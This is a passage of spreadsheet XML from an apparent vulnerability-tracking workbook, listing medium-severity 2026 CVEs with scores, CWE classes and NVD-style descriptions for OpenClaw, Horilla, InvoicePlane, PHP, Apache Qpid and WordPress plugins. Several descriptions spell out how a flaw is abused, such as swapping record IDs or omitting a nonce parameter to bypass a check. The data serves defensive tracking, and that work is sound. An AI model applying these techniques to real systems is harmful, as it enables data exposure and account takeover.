    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100594</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr"/>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q248" s="5" t="inlineStr"/>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S248" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.7.1 contain an authorization bypass vulnerability in the /export-trajectory endpoint that allows non-owner senders to request and receive owner-only trajectory bundles. Attackers can access prompts, model messages, tool schemas, runtime events, and local path metadata from affected sessions by exploiting insufficient authorization checks.</t>
        </is>
      </c>
      <c r="T248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100594</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100595</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q249" s="5" t="inlineStr"/>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S249" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.7.1 contain an authorization bypass vulnerability in the diagnostics export command that allows non-owner channel senders to access owner-only host diagnostic bundles. Attackers can request and receive diagnostic details about the host, configuration, runtime, and connected services intended only for owners.</t>
        </is>
      </c>
      <c r="T249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100595</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63431</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S250" s="5" t="inlineStr">
        <is>
          <t>Horilla is an HR and CRM software. In 1.5.0-85 and earlier, payroll/views/component_views.py does not consistently authorize access in allowances_deductions_tab, view_single_allowance, and view_single_deduction before loading records selected by emp_id, allowance_id, or deduction_id. An authenticated employee can substitute those identifiers to read another employee's salary structure, allowance and deduction amounts, personal loan disbursements, and repayment schedules without owning the record or holding payroll-view permissions. No complete fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="T250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63431</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63432</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr">
        <is>
          <t>django, go</t>
        </is>
      </c>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-94</t>
        </is>
      </c>
      <c r="S251" s="5" t="inlineStr">
        <is>
          <t>Horilla is an HR and CRM software. From 1.0.0 until 1.6.0 and 2.0.0, the get_mail_preview handlers in recruitment/views/actions.py and employee/not_in_out_dashboard.py render a user-controlled body at /recruitment/get-mail-preview/ and /employee/get-employee-mail-preview with the full request object in the Django template context. An authenticated user with a valid CSRF token can use template attribute traversal to read request.user.password, request.META, and related-user attributes, exposing password hashes, personal data, and server request metadata. Django template restrictions prevent arbitrary code execution through this primitive, so the demonstrated impact is information disclosure and possible offline password cracking or account compromise. This issue is fixed in versions 1.6.0 and 2.0.0.</t>
        </is>
      </c>
      <c r="T251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63432</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85274</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S252" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane exposes Recurring::stop() as a state-changing GET route without CSRF token validation. When an authenticated administrator loads attacker-controlled content that requests /invoices/recurring/stop/{id}, the application stops the selected recurring invoice. An attacker can target multiple identifiers to interrupt recurring billing and cause financial loss. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85274</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85289</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="inlineStr"/>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S253" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane omits ensure_valid_post_request() from delete methods including Payments::delete(), Recurring::delete(), and User_clients::delete(). Although the routes require POST, they do not validate the request's CSRF token. An attacker can submit a cross-origin form through an authenticated administrator's browser to delete financial records and other application data. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85289</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85291</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="inlineStr"/>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S254" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane's Users::change_password() method accepts a user_id from the URL and updates that account's password without an object-level authorization check. An authenticated secondary administrator can target the primary administrator account and replace its password without knowing the current password. The attacker can then take over the primary account and access its data and privileges. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85291</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91767</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr">
        <is>
          <t>openssl, php, hp</t>
        </is>
      </c>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q255" s="5" t="inlineStr"/>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S255" s="5" t="inlineStr">
        <is>
          <t>php_openssl_matches_wildcard_name() in ext/openssl/xp_ssl.c underflows the length argument passed to memchr() when a TLS server certificate presents a wildcard name whose literal characters are together longer than the hostname being verified. A malicious server presenting such a certificate makes the PHP client read up to SIZE_MAX bytes past the end of a heap allocation. The path is reachable from any default client stream, because verify_peer_name is enabled by default.</t>
        </is>
      </c>
      <c r="T255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91767</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91768</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="inlineStr"/>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr"/>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q256" s="5" t="inlineStr"/>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>CWE-1023</t>
        </is>
      </c>
      <c r="S256" s="5" t="inlineStr">
        <is>
          <t>The IPv6 branch of the FastCGI client access check compares only the first 12 bytes of a 16-byte IPv6 address, so listen.allowed_clients matches on a /96 prefix instead of the exact address. An attacker who can source an address sharing the first 96 bits with an allowed one passes the check and reaches the FastCGI endpoint.</t>
        </is>
      </c>
      <c r="T256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91768</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92573</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr"/>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="S257" s="5" t="inlineStr">
        <is>
          <t>Improper handling of compressed data in the shared GZIP decompressor used for AMQP 0-8/0-9/0-9-1 and AMQP 0-10 message delivery, message conversion and HTTP management JSON rendering allows authenticated message producers to exhaust memory and disrupt broker availability via processing without a decompressed-output limit.
This issue affects Apache Qpid Broker-J: through 10.1.0.
Users are recommended to upgrade to version 10.1.1, which fixes the issue.</t>
        </is>
      </c>
      <c r="T257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92573</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93030</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="inlineStr"/>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr"/>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q258" s="5" t="inlineStr"/>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S258" s="5" t="inlineStr">
        <is>
          <t>FTM 4.x ALL could allow a remote authenticated attacker to obtain sensitive information due to an XML external entity injection flaw.</t>
        </is>
      </c>
      <c r="T258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93030</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93899</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q259" s="5" t="inlineStr"/>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S259" s="5" t="inlineStr">
        <is>
          <t>The Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots plugin for WordPress is vulnerable to generic SQL Injection via 'group_id' Message Meta Parameter in all versions up to, and including, 3.0.4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 Exploitation requires the BuddyBoss Platform plugin to be installed with its Social Groups component disabled, a state that persists on any site that has previously toggled the Groups component off since BuddyBoss does not drop the wp_bp_groups table upon deactivation.</t>
        </is>
      </c>
      <c r="T259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93899</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100529</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="inlineStr"/>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K260" s="5" t="inlineStr"/>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q260" s="5" t="inlineStr"/>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S260" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain an authorization scope widening vulnerability in file-transfer allow-always approvals that allows attackers to reuse standing grants for unreviewed paths. Attackers can exploit glob metacharacter interpretation and node display name reuse to access sibling paths or different nodes beyond the operator's original approval scope.</t>
        </is>
      </c>
      <c r="T260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100529</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100546</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="inlineStr"/>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S261" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) versions &gt;= 2026.7.2 and &lt; 2026.9.2 contain a race condition in the Discord realtime voice transcript path. Concurrent control-classified voice transcripts could consume speaker context belonging to another participant after an asynchronous control check, causing a transcript to inherit another speaker's owner status. In Discord agent-proxy voice sessions using the affected realtime control path, an utterance from a non-owner participant could reach the downstream agent boundary marked as owner, so owner-sensitive behavior is applied to the wrong speaker. Exploitation depends on concurrent transcript timing and on the tools and commands available to the affected agent. The issue is fixed in 2026.9.2; as a workaround, disable Discord realtime voice for agents that distinguish owner and non-owner senders.</t>
        </is>
      </c>
      <c r="T261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100546</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13179</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S262" s="5" t="inlineStr">
        <is>
          <t>The WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory &amp; Filters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shapes_values Parameter in all versions up to, and including, 4.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The fc-call-nonce nonce required by the endpoint is exposed to all frontend visitors who view a map page via window.wpgmp_local.nonce, enabling any authenticated subscriber to read the nonce and craft a valid request; additionally, the secondary _wpnonce check in the drawing handler can be bypassed by simply omitting the _wpnonce parameter from the request.</t>
        </is>
      </c>
      <c r="T262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13179</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15273</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>6.4</v>
      </c>
